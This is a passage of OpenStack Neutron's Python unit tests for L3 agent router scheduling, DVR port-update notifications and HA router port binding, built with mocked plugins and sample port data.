admin_state_up=True)
self.assertEqual([agent.id], [agt.id for agt in agents])
self._set_l3_agent_admin_state(ctx, agent.id, False)
agents = self.plugin.get_l3_agents_hosting_routers(ctx,
[router_id])
self.assertEqual([agent.id], [agt.id for agt in agents])
agents = self.plugin.get_l3_agents_hosting_routers(ctx,
[router_id],
admin_state_up=True)
self.assertEqual([], agents)
class L3SchedulerTestCaseMixin(test_l3.L3NatTestCaseMixin,
L3SchedulerBaseMixin,
L3SchedulerTestBaseMixin):
def setUp(self):
self.mock_rescheduling = False
ext_mgr = test_l3.L3TestExtensionManager()
plugin_str = ('neutron.tests.unit.extensions.test_l3.'
'TestL3NatIntAgentSchedulingPlugin')
super(L3SchedulerTestCaseMixin, self).setUp(plugin=plugin_str,
ext_mgr=ext_mgr)
self.adminContext = n_context.get_admin_context()
self.plugin = directory.get_plugin()
self.plugin.router_scheduler = importutils.import_object(
'neutron.scheduler.l3_agent_scheduler.ChanceScheduler'
)
self._register_l3_agents()
class L3AgentChanceSchedulerTestCase(L3SchedulerTestCaseMixin,
test_db_base_plugin_v2.
NeutronDbPluginV2TestCase):
def setUp(self):
super(L3AgentChanceSchedulerTestCase, self).setUp()
# Removes MissingAuthPlugin exception from logs
self.patch_notifier = mock.patch(
'neutron.notifiers.batch_notifier.BatchNotifier._notify')
self.patch_notifier.start()
def test_random_scheduling(self):
random_patch = mock.patch('random.choice')
random_mock = random_patch.start()
def side_effect(seq):
return seq[0]
random_mock.side_effect = side_effect
with self.subnet() as subnet:
self._set_net_external(subnet['subnet']['network_id'])
with self.router_with_ext_gw(name='r1', subnet=subnet) as r1:
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['router']['id']],
admin_state_up=True)
self.assertEqual(1, len(agents))
self.assertEqual(1, random_mock.call_count)
with self.router_with_ext_gw(name='r2', subnet=subnet) as r2:
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r2['router']['id']],
admin_state_up=True)
self.assertEqual(len(agents), 1)
self.assertEqual(2, random_mock.call_count)
random_patch.stop()
def test_scheduler_auto_schedule_when_agent_added(self):
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id1, False)
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id2, False)
with self.subnet() as subnet:
self._set_net_external(subnet['subnet']['network_id'])
with self.router_with_ext_gw(name='r1', subnet=subnet) as r1:
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['router']['id']],
admin_state_up=True)
self.assertEqual(0, len(agents))
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id1, True)
self.plugin.auto_schedule_routers(self.adminContext, 'host_1')
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['router']['id']],
admin_state_up=True)
self.assertEqual('host_1', agents[0]['host'])
class L3AgentLeastRoutersSchedulerTestCase(L3SchedulerTestCaseMixin,
test_db_base_plugin_v2.
NeutronDbPluginV2TestCase):
def setUp(self):
super(L3AgentLeastRoutersSchedulerTestCase, self).setUp()
self.plugin.router_scheduler = importutils.import_object(
'neutron.scheduler.l3_agent_scheduler.LeastRoutersScheduler'
)
def test_scheduler(self):
# disable one agent to force the scheduling to the only one.
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id2, False)
with self.subnet() as subnet:
self._set_net_external(subnet['subnet']['network_id'])
with self.router_with_ext_gw(name='r1', subnet=subnet) as r1:
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['router']['id']],
admin_state_up=True)
self.assertEqual(1, len(agents))
agent_id1 = agents[0]['id']
with self.router_with_ext_gw(name='r2', subnet=subnet) as r2:
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r2['router']['id']],
admin_state_up=True)
self.assertEqual(1, len(agents))
agent_id2 = agents[0]['id']
self.assertEqual(agent_id1, agent_id2)
# re-enable the second agent to see whether the next router
# spawned will be on this one.
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id2, True)
with self.router_with_ext_gw(name='r3',
subnet=subnet) as r3:
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r3['router']['id']],
admin_state_up=True)
self.assertEqual(1, len(agents))
agent_id3 = agents[0]['id']
self.assertNotEqual(agent_id1, agent_id3)
class L3DvrScheduler(l3_db.L3_NAT_db_mixin,
l3_dvrscheduler_db.L3_DVRsch_db_mixin):
pass
class L3DvrSchedulerTestCase(L3SchedulerBaseMixin,
test_db_base_plugin_v2.
NeutronDbPluginV2TestCase):
l3_plugin = ('neutron.tests.unit.extensions.test_l3.'
'TestL3NatAgentSchedulingServicePlugin')
def setUp(self):
if self.l3_plugin:
service_plugins = {
'l3_plugin_name': self.l3_plugin,
'flavors_plugin_name': 'neutron.services.flavors.'
'flavors_plugin.FlavorsPlugin'
}
else:
service_plugins = None
super(L3DvrSchedulerTestCase, self).setUp('ml2',
service_plugins=service_plugins)
self.useFixture(fixture.CallbackRegistryFixture())
self.setup_coreplugin('ml2')
self.adminContext = n_context.get_admin_context()
self.dut = L3DvrScheduler()
self.l3plugin = directory.get_plugin(plugin_constants.L3)
def test__notify_l3_agent_update_port_with_allowed_address_pairs_revert(
self):
port_id = uuidutils.generate_uuid()
context = self.adminContext
port = {
'id': port_id,
'admin_state_up': False,
portbindings.HOST_ID: 'vm-host',
'device_id': 'vm-id',
'allowed_address_pairs': [
{'ip_address': '10.1.0.201',
'mac_address': 'aa:bb:cc:dd:ee:ff'}],
'device_owner': DEVICE_OWNER_COMPUTE, }
original_port = {
'id': port_id,
'admin_state_up': True,
portbindings.HOST_ID: 'vm-host',
'device_id': 'vm-id',
'allowed_address_pairs': [
{'ip_address': '10.1.0.201',
'mac_address': 'aa:bb:cc:dd:ee:ff'}],
'device_owner': DEVICE_OWNER_COMPUTE, }
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context, resource_id=port_id, states=(original_port, port,)))
l3plugin._get_allowed_address_pair_fixed_ips.return_value = (
['10.1.0.21'])
self.assertFalse(
l3plugin.update_arp_entry_for_dvr_service_port.called)
l3plugin.delete_arp_entry_for_dvr_service_port.\
assert_called_once_with(
self.adminContext,
original_port,
fixed_ips_to_delete=mock.ANY)
def test__notify_l3_agent_update_port_with_allowed_address_pairs(self):
port_id = uuidutils.generate_uuid()
context = self.adminContext
port = {
'id': port_id,
portbindings.HOST_ID: 'vm-host',
'allowed_address_pairs': [
{'ip_address': '10.1.0.201',
'mac_address': 'aa:bb:cc:dd:ee:ff'}],
'device_id': 'vm-id',
'device_owner': DEVICE_OWNER_COMPUTE,
'admin_state_up': True, }
original_port = {
'id': port_id,
portbindings.HOST_ID: 'vm-host',
'device_id': 'vm-id',
'device_owner': DEVICE_OWNER_COMPUTE,
'admin_state_up': True, }
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context, resource_id=port_id, states=(original_port, port,)))
self.assertTrue(
l3plugin.update_arp_entry_for_dvr_service_port.called)
def test__notify_l3_agent_when_unbound_port_migrates_to_bound_host(self):
port_id = 'fake-port'
context = self.adminContext
original_port = {
'id': port_id,
portbindings.HOST_ID: '',
'device_owner': '',
'admin_state_up': True}
port = {
'id': port_id,
portbindings.HOST_ID: 'vm-host',
'device_owner': DEVICE_OWNER_COMPUTE,
'mac_address': '02:04:05:17:18:19'}
plugin = directory.get_plugin()
l3plugin = mock.MagicMock()
l3plugin.supported_extension_aliases = [
'router', constants.L3_AGENT_SCHEDULER_EXT_ALIAS,
constants.L3_DISTRIBUTED_EXT_ALIAS
]
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, plugin,
payload=events.DBEventPayload(
context, resource_id=port_id, states=(original_port, port,)))
l3plugin.dvr_handle_new_service_port.assert_called_once_with(
self.adminContext, port, unbound_migrate=True)
def test__notify_l3_agent_update_port_no_removing_routers(self):
port_id = 'fake-port'
context = self.adminContext
port = None
original_port = {
'id': port_id,
portbindings.HOST_ID: 'vm-host',
'device_id': 'vm-id',
'device_owner': DEVICE_OWNER_COMPUTE,
'mac_address': '02:04:05:17:18:19'}
plugin = directory.get_plugin()
l3plugin = mock.Mock()
l3plugin.supported_extension_aliases = [
'router', constants.L3_AGENT_SCHEDULER_EXT_ALIAS,
constants.L3_DISTRIBUTED_EXT_ALIAS
]
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, plugin,
payload=events.DBEventPayload(
context,
metadata={'mac_address_updated': True},
resource_id=port_id,
states=(original_port, port,)))
self.assertFalse(
l3plugin.update_arp_entry_for_dvr_service_port.called)
self.assertFalse(
l3plugin.dvr_handle_new_service_port.called)
self.assertFalse(l3plugin.remove_router_from_l3_agent.called)
self.assertFalse(l3plugin.get_dvr_routers_to_remove.called)
def test__notify_l3_agent_new_port_action(self):
port_dict = {'device_owner': DEVICE_OWNER_COMPUTE}
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_new_port(
resources.PORT, events.AFTER_CREATE, mock.ANY,
payload=events.DBEventPayload(
self.adminContext, states=(port_dict,)))
l3plugin.update_arp_entry_for_dvr_service_port.\
assert_called_once_with(
self.adminContext, port_dict)
l3plugin.dvr_handle_new_service_port.assert_called_once_with(
self.adminContext, port_dict)
def test__notify_l3_agent_new_port_no_action(self):
port_dict = {
'device_owner': constants.DEVICE_OWNER_NETWORK_PREFIX + 'None'}
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_new_port(
resources.PORT, events.AFTER_CREATE, mock.ANY,
payload=events.DBEventPayload(
self.adminContext, states=(port_dict,)))
self.assertFalse(
l3plugin.update_arp_entry_for_dvr_service_port.called)
self.assertFalse(
l3plugin.dvr_handle_new_service_port.called)
def test__notify_l3_agent_update_port_with_migration_port_profile(self):
context = self.adminContext
original_port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': DEVICE_OWNER_COMPUTE,
'id': uuidutils.generate_uuid()}
port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': DEVICE_OWNER_COMPUTE,
portbindings.PROFILE: {'migrating_to': 'vm-host2'}}
l3plugin = mock.MagicMock()
directory.add_plugin(plugin_constants.L3, l3plugin)
with mock.patch.object(l3plugin, '_get_floatingips_by_port_id',
return_value=[]):
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context, states=(original_port, port,)))
l3plugin.dvr_handle_new_service_port.assert_called_once_with(
context, port,
dest_host='vm-host2', router_id=None)
l3plugin.update_arp_entry_for_dvr_service_port.\
assert_called_once_with(
context, port)
def test__notify_l3_agent_update_port_no_action(self):
context = self.adminContext
original_port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': DEVICE_OWNER_COMPUTE}
port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': DEVICE_OWNER_COMPUTE}
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context, states=(original_port, port,)))
self.assertFalse(
l3plugin.update_arp_entry_for_dvr_service_port.called)
self.assertFalse(
l3plugin.dvr_handle_new_service_port.called)
self.assertFalse(l3plugin.remove_router_from_l3_agent.called)
self.assertFalse(l3plugin.get_dvr_routers_to_remove.called)
def test__notify_l3_agent_update_port_with_mac_address_update(self):
context = self.adminContext
original_port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': DEVICE_OWNER_COMPUTE,
'mac_address': '02:04:05:17:18:19'}
port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': DEVICE_OWNER_COMPUTE,
'mac_address': '02:04:05:17:18:29'}
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context,
metadata={'mac_address_updated': True},
states=(original_port, port,)))
l3plugin.update_arp_entry_for_dvr_service_port.\
assert_called_once_with(
context, port)
self.assertFalse(l3plugin.dvr_handle_new_service_port.called)
def test__notify_l3_agent_update_port_with_ip_update(self):
context = self.adminContext
original_port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': constants.DEVICE_OWNER_ROUTER_GW,
'fixed_ips': [{'ip_address': '1.1.1.1'}],
'mac_address': '02:04:05:17:18:19'
}
port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': constants.DEVICE_OWNER_ROUTER_GW,
'fixed_ips': [{'ip_address': '2.2.2.2'}],
'mac_address': '02:04:05:17:18:19'
}
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context,
metadata={'mac_address_updated': True},
states=(original_port, port,)))
l3plugin.update_arp_entry_for_dvr_service_port.\
assert_called_once_with(
context, port)
self.assertFalse(l3plugin.dvr_handle_new_service_port.called)
def test__notify_l3_agent_update_port_without_ip_change(self):
context = self.adminContext
original_port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': constants.DEVICE_OWNER_ROUTER_GW,
'fixed_ips': [{'ip_address': '1.1.1.1'}],
}
port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': constants.DEVICE_OWNER_ROUTER_GW,
'fixed_ips': [{'ip_address': '1.1.1.1'}]}
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context, states=(original_port, port,)))
self.assertFalse(l3plugin.update_arp_entry_for_dvr_service_port.called)
self.assertFalse(l3plugin.dvr_handle_new_service_port.called)
def test__notify_l3_agent_port_binding_change(self):
self._test__notify_l3_agent_port_binding_change()
def test__notify_l3_agent_port_binding_change_removed_routers(self):
router_to_remove = [{'agent_id': 'foo_agent',
'router_id': 'foo_id',
'host': 'vm-host1'}]
self._test__notify_l3_agent_port_binding_change(router_to_remove)
def test__notify_l3_agent_port_binding_change_removed_routers_fip(self):
fip = {'router_id': 'router_id'}
router_to_remove = [{'agent_id': 'foo_agent',
'router_id': 'foo_id',
'host': 'vm-host1'}]
self._test__notify_l3_agent_port_binding_change(
router_to_remove, fip,
router_id=fip['router_id'])
def test__notify_l3_agent_port_binding_change_with_fip(self):
fip = {'router_id': 'router_id'}
self._test__notify_l3_agent_port_binding_change(
None, fip, router_id=fip['router_id'])
def test__notify_l3_agent_port_binding_change_fip_dvr(self):
fip = {'router_id': 'router_id'}
is_distributed = True
self._test__notify_l3_agent_port_binding_change(
None,
fip, is_distributed,
router_id=fip['router_id'])
def test__notify_l3_agent_port_binding_change_fip_dvr_rmrt(self):
fip = {'router_id': 'router_id'}
router_to_remove = [{'agent_id': 'foo_agent',
'router_id': 'foo_id',
'host': 'vm-host1'}]
is_distributed = True
self._test__notify_l3_agent_port_binding_change(
router_to_remove, fip, is_distributed,
router_id=fip['router_id'])
def test__notify_l3_agent_port_binding_change_fip_dvr_on_rmrt(self):
fip = {'router_id': 'foo_id'}
router_to_remove = [{'agent_id': 'foo_agent',
'router_id': 'foo_id',
'host': 'vm-host1'}]
is_distributed = True
self._test__notify_l3_agent_port_binding_change(
router_to_remove, fip, is_distributed,
router_id=fip['router_id'])
def _test__notify_l3_agent_port_binding_change(self,
routers_to_remove=None,
fip=None,
is_distributed=False,
router_id=None):
source_host = 'vm-host1'
context = self.adminContext
original_port = {
'id': uuidutils.generate_uuid(),
portbindings.HOST_ID: source_host,
'device_owner': DEVICE_OWNER_COMPUTE}
port = {
portbindings.HOST_ID: 'vm-host2',
'device_owner': DEVICE_OWNER_COMPUTE}
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
with mock.patch.object(l3plugin, 'get_dvr_routers_to_remove',
return_value=routers_to_remove
if routers_to_remove else []),\
mock.patch.object(l3plugin, '_get_floatingips_by_port_id',
return_value=[fip] if fip else []),\
mock.patch.object(l3_dvr_db, 'is_distributed_router',
return_value=is_distributed):
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context, states=(original_port, port,)))
if routers_to_remove:
(l3plugin.l3_rpc_notifier.router_removed_from_agent.
assert_called_once_with(mock.ANY, 'foo_id', source_host))
self.assertEqual(
1,
l3plugin.delete_arp_entry_for_dvr_service_port.call_count)
if fip and is_distributed and not (routers_to_remove and
fip['router_id'] is routers_to_remove[0]['router_id']):
(l3plugin.l3_rpc_notifier.routers_updated_on_host.
assert_called_once_with(mock.ANY, ['router_id'], source_host))
self.assertEqual(
1, l3plugin.update_arp_entry_for_dvr_service_port.call_count)
l3plugin.dvr_handle_new_service_port.assert_called_once_with(
context, port,
dest_host=None, router_id=router_id)
def test__notify_l3_agent_update_port_removing_routers(self):
port_id = 'fake-port'
source_host = 'vm-host'
context = self.adminContext
port = {
'id': port_id,
portbindings.HOST_ID: None,
'device_id': '',
'device_owner': ''}
original_port = {
'id': port_id,
portbindings.HOST_ID: source_host,
'device_id': 'vm-id',
'device_owner': DEVICE_OWNER_COMPUTE}
plugin = directory.get_plugin()
l3plugin = mock.Mock()
l3plugin.supported_extension_aliases = [
'router', constants.L3_AGENT_SCHEDULER_EXT_ALIAS,
constants.L3_DISTRIBUTED_EXT_ALIAS
]
directory.add_plugin(plugin_constants.L3, l3plugin)
with mock.patch.object(l3plugin, 'get_dvr_routers_to_remove',
return_value=[{'agent_id': 'foo_agent',
'router_id': 'foo_id',
'host': source_host}]),\
mock.patch.object(l3plugin, '_get_floatingips_by_port_id',
return_value=[]):
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, plugin,
payload=events.DBEventPayload(
context,
metadata={'mac_address_updated': True},
resource_id=port_id,
states=(original_port, port,)))
self.assertEqual(
1, l3plugin.delete_arp_entry_for_dvr_service_port.call_count)
l3plugin.delete_arp_entry_for_dvr_service_port.\
assert_called_once_with(
self.adminContext, mock.ANY)
self.assertFalse(
l3plugin.dvr_handle_new_service_port.called)
(l3plugin.l3_rpc_notifier.router_removed_from_agent.
assert_called_once_with(mock.ANY, 'foo_id', source_host))
def test__notify_port_delete(self):
plugin = directory.get_plugin()
l3plugin = mock.Mock()
l3plugin.supported_extension_aliases = [
'router', constants.L3_AGENT_SCHEDULER_EXT_ALIAS,
constants.L3_DISTRIBUTED_EXT_ALIAS
]
directory.add_plugin(plugin_constants.L3, l3plugin)
port = {
'id': uuidutils.generate_uuid(),
'device_id': 'abcd',
'device_owner': DEVICE_OWNER_COMPUTE_NOVA,
portbindings.HOST_ID: 'host1',
}
removed_routers = [{'agent_id': 'foo_agent',
'router_id': 'foo_id',
'host': 'foo_host'}]
l3plugin.get_dvr_routers_to_remove.return_value = removed_routers
l3_dvrscheduler_db._notify_port_delete(
'port', 'after_delete', plugin,
payload=events.DBEventPayload(
self.adminContext,
metadata={'removed_routers': removed_routers},
states=(port,)))
l3plugin.delete_arp_entry_for_dvr_service_port.\
assert_called_once_with(
self.adminContext, mock.ANY)
(l3plugin.l3_rpc_notifier.router_removed_from_agent.
assert_called_once_with(mock.ANY, 'foo_id', 'foo_host'))
def test_dvr_handle_new_service_port(self):
port = {
'id': 'port1',
'device_id': 'abcd',
'device_owner': DEVICE_OWNER_COMPUTE_NOVA,
portbindings.HOST_ID: 'host1',
'fixed_ips': [
{
'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
'ip_address': '10.10.10.3'
}
]
}
dvr_ports = [
{
'id': 'dvr_port1',
'device_id': 'r1',
'device_owner': constants.DEVICE_OWNER_DVR_INTERFACE,
'fixed_ips': [
{
'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
'ip_address': '10.10.10.1'
}
]
},
{
'id': 'dvr_port2',
'device_id': 'r2',
'device_owner': constants.DEVICE_OWNER_DVR_INTERFACE,
'fixed_ips': [
{
'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
'ip_address': '10.10.10.123'
}
]
}
]
agent_on_host = {'id': 'agent1'}
with mock.patch(
'neutron.db.db_base_plugin_v2.NeutronDbPluginV2' '.get_ports',
return_value=dvr_ports),\
mock.patch('neutron.api.rpc.agentnotifiers.l3_rpc_agent_api'
'.L3AgentNotifyAPI'),\
mock.patch.object(
self.dut, 'get_l3_agents',
return_value=[agent_on_host]) as get_l3_agents:
self.dut.dvr_handle_new_service_port(
self.adminContext, port)
get_l3_agents.assert_called_once_with(
self.adminContext,
filters={'host': [port[portbindings.HOST_ID]]})
self.dut.l3_rpc_notifier.routers_updated_on_host.\
assert_called_once_with(self.adminContext,
{'r1', 'r2'}, 'host1')
self.assertFalse(self.dut.l3_rpc_notifier.routers_updated.called)
def test_get_dvr_routers_by_subnet_ids(self):
subnet_id = '80947d4a-fbc8-484b-9f92-623a6bfcf3e0'
dvr_port = {
'id': 'dvr_port1',
'device_id': 'r1',
'device_owner': constants.DEVICE_OWNER_DVR_INTERFACE,
'fixed_ips': [
{
'subnet_id': subnet_id,
'ip_address': '10.10.10.1'
}
]
}
r1 = {
'id': 'r1',
'distributed': True,
}
with mock.patch(
'neutron.db.db_base_plugin_v2.NeutronDbPluginV2' '.get_port',
return_value=dvr_port),\
mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2'
'.get_ports', return_value=[dvr_port]):
router_id = self.dut.get_dvr_routers_by_subnet_ids(
self.adminContext, [subnet_id])
self.assertEqual(r1['id'], router_id.pop())
def test_get_subnet_ids_on_router(self):
dvr_port = {
'id': 'dvr_port1',
'device_id': 'r1',
'device_owner': constants.DEVICE_OWNER_DVR_INTERFACE,
'fixed_ips': [
{
'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
'ip_address': '10.10.10.1'
}
]
}
r1 = {
'id': 'r1',
'distributed': True,
}
with mock.patch(
'neutron.db.db_base_plugin_v2.NeutronDbPluginV2' '.get_ports',
return_value=[dvr_port]):
sub_ids = self.dut.get_subnet_ids_on_router(self.adminContext,
r1['id'])
self.assertEqual(sub_ids.pop(),
dvr_port.get('fixed_ips').pop(0).get('subnet_id'))
def test_get_subnet_ids_on_router_no_subnet(self):
dvr_port = {
'id': 'dvr_port1',
'device_id': 'r1',
'device_owner': constants.DEVICE_OWNER_DVR_INTERFACE,
'fixed_ips': []
}
r1 = {
'id': 'r1',
'distributed': True,
}
with mock.patch.object(db_v2.NeutronDbPluginV2, 'get_ports',
return_value=[dvr_port]):
sub_ids = self.dut.get_subnet_ids_on_router(self.adminContext,
r1['id'])
self.assertEqual(0, len(sub_ids))
def test__check_dvr_serviceable_ports_on_host(self):
# HOST_DVR = 'my_l3_host_dvr'
# HOST_DVR_SNAT = 'my_l3_host_dvr_snat'
# HOST_DVR is a sub-string of HOST_DVR_SNAT
self._register_l3_dvr_agents()
host_args = {'admin_state_up': True,
portbindings.PROFILE: {'migrating to': HOST_DVR_SNAT}}
with self.network() as network:
with self.subnet(network=network) as subnet:
subnet_ids = []
subnet_ids.append(subnet['subnet']['id'])
with self.port(subnet=subnet,
is_admin=True,
device_owner=DEVICE_OWNER_COMPUTE,
arg_list=('admin_state_up',
portbindings.PROFILE,), **host_args):
# Check DVR serviceable ports on HOST_DVR_SNAT.
# Should find existence since it is an exact match to the
# target host name of the port binding profile.
result0 = self.l3plugin. \
_check_dvr_serviceable_ports_on_host(self.adminContext,
self.l3_dvr_snat_agent['host'], subnet_ids)
# Check DVR serviceable ports on HOST_DVR.
# Should not find existence since the sub-string won't get
# matched with the target host.
result1 = self.l3plugin. \
_check_dvr_serviceable_ports_on_host(self.adminContext,
self.l3_dvr_agent['host'], subnet_ids)
self.assertTrue(result0)
self.assertFalse(result1)
def _prepare_schedule_snat_tests(self):
agent = agent_obj.Agent(mock.ANY, id=uuidutils.generate_uuid())
agent.admin_state_up = True
agent.heartbeat_timestamp = timeutils.utcnow()
router = {
'id': 'foo_router_id',
'distributed': True,
'external_gateway_info': {
'network_id': uuidutils.generate_uuid(),
'enable_snat': True
}
}
return agent, router
class L3HAPlugin(db_v2.NeutronDbPluginV2,
l3_hamode_db.L3_HA_NAT_db_mixin,
l3_hascheduler_db.L3_HA_scheduler_db_mixin):
supported_extension_aliases = [l3_ext_ha_mode.ALIAS,
router_availability_zone.ALIAS]
@classmethod
def get_plugin_type(cls):
return plugin_constants.L3
def get_plugin_description(self):
return "L3 Routing Service Plugin for testing"
class L3HATestCaseMixin(testlib_api.SqlTestCase,
L3SchedulerBaseMixin):
def setUp(self):
super(L3HATestCaseMixin, self).setUp()
self.adminContext = n_context.get_admin_context()
mock.patch.object(n_rpc, 'get_client').start()
self.setup_coreplugin('ml2', load_plugins=False)
cfg.CONF.set_override('service_plugins',
['neutron.tests.unit.scheduler.'
'test_l3_agent_scheduler.L3HAPlugin'])
cfg.CONF.set_override('max_l3_agents_per_router', 0)
manager.init()
self.plugin = directory.get_plugin(plugin_constants.L3)
self.plugin.router_scheduler = importutils.import_object(
'neutron.scheduler.l3_agent_scheduler.ChanceScheduler'
)
self._register_l3_agents()
make_res = mock.patch.object(quota.QuotaEngine, 'make_reservation')
self.mock_make_res = make_res.start()
commit_res = mock.patch.object(quota.QuotaEngine, 'commit_reservation')
self.mock_quota_commit_res = commit_res.start()
# Extend network HA extension.
rname = network_ha.COLLECTION_NAME
attributes.RESOURCES[rname].update(
network_ha.RESOURCE_ATTRIBUTE_MAP[rname])
@staticmethod
def get_router_l3_agent_binding(context, router_id, l3_agent_id=None,
binding_index=None):
args = {'router_id': router_id}
if l3_agent_id:
args['l3_agent_id'] = l3_agent_id
if binding_index:
args['binding_index'] = binding_index
return rb_obj.RouterL3AgentBinding.get_objects(context, **args)
def _create_ha_router(self, ha=True, tenant_id='tenant1', az_hints=None):
self.adminContext.tenant_id = tenant_id
router = {'name': 'router1', 'admin_state_up': True,
'tenant_id': tenant_id}
if ha is not None:
router['ha'] = ha
if az_hints is None:
az_hints = []
router['availability_zone_hints'] = az_hints
return self.plugin.create_router(self.adminContext,
{'router': router})
def test_create_ha_port_and_bind_catch_integrity_error(self):
router = self._create_ha_router(tenant_id='foo_tenant')
self.plugin.schedule_router(self.adminContext, router['id'])
agent = {'id': 'foo_agent'}
orig_fn = orm.Session.add
def db_ref_err_for_add_haportbinding(s, instance):
if instance.__class__.__name__ == 'L3HARouterAgentPortBinding':
instance.router_id = 'nonexistent_router'
return orig_fn(s, instance)
with mock.patch.object(self.plugin.router_scheduler, 'bind_router'):
with mock.patch.object(
orm.Session, 'add',
side_effect=db_ref_err_for_add_haportbinding,
autospec=True):
self.plugin.router_scheduler.create_ha_port_and_bind(
self.plugin, self.adminContext,
router['id'], router['tenant_id'], agent)
def test_create_ha_port_and_bind_wont_create_redundant_ports(self):
# When migrating from HA to DVR+HA router, create_ha_port_and_bind
# should create only one network:router_ha_interface port on a router
# when binding to same agent. So we need only one agent for testing
# (preferably with dvr_snat mode).
agent_obj.Agent.update_objects(
self.adminContext, {'admin_state_up': False})
l3_dvr_snat_agent = helpers.register_l3_agent(
'fake_l3_host_dvr_snat', constants.L3_AGENT_MODE_DVR_SNAT)
router = self._create_ha_router(tenant_id='foo_tenant')
self.plugin.schedule_router(self.adminContext, router['id'])
router['admin_state_up'] = False
updated_router1 = self.plugin.update_router(
self.adminContext, router['id'], {'router': router})
updated_router1['distributed'] = True
self.plugin.update_router(
self.adminContext, router['id'], {'router': updated_router1})
self.plugin.router_scheduler.create_ha_port_and_bind(
self.plugin, self.adminContext, router['id'],
router['tenant_id'], l3_dvr_snat_agent)
filters = {'device_owner': ['network:router_ha_interface'],
'device_id': [router['id']]}
self.core_plugin = directory.get_plugin()
ports = self.core_plugin.get_ports(
self.adminContext, filters=filters)
self.assertEqual(1, len(ports))
def test_create_ha_port_and_bind_catch_router_not_found(self):
router = self._create_ha_router(tenant_id='foo_tenant')
self.plugin.schedule_router(self.adminContext, router['id'])
agent = {'id': 'foo_agent'}
with mock.patch.object(self.plugin.router_scheduler, 'bind_router'):
with mock.patch.object(
self.plugin, 'add_ha_port',
side_effect=l3_exc.RouterNotFound(
router_id='foo_router')),\
mock.patch.object(
self.plugin, 'safe_delete_ha_network') as sd_ha_net:
self.plugin.router_scheduler.create_ha_port_and_bind(
self.plugin, self.adminContext,
router['id'], router['tenant_id'], agent)
self.assertTrue(sd_ha_net.called)
def test_create_ha_port_and_bind_bind_router_returns_None(self):
router = self._create_ha_router(tenant_id='foo_tenant')
agent = {'id': 'foo_agent'}
with mock.patch.object(self.plugin.router_scheduler, 'bind_router',
return_value=None):
with mock.patch.object(self.plugin, 'add_ha_port') as add_ha_port:
self.plugin.router_scheduler.create_ha_port_and_bind(
self.plugin, self.adminContext,
router['id'], router['tenant_id'], agent)
self.assertFalse(add_ha_port.called)
class VacantBindingIndexTestCase(L3HATestCaseMixin):
"""Test various scenarios for get_vacant_binding_index().
binding_index
The binding_index we want to delete/unschedule.
is_manual_scheduling
Whether or not this is a scheduling requested by the user
(`neutron l3-agent-router-add`) or by some worker (scheduler or RPC
from agent). If this is a manual scheduling we should always
comply.
"""
binding_scenarios = [
('Delete first binding_index',
